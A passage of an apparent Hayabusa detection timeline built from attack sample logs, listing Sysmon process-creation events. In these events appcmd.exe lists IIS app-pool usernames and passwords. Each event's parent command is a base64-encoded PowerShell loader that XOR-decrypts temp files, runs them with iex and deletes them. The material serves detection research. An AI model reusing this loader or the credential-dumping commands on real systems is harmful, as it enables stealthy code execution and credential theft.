ZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.041 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3144 | PGUID: 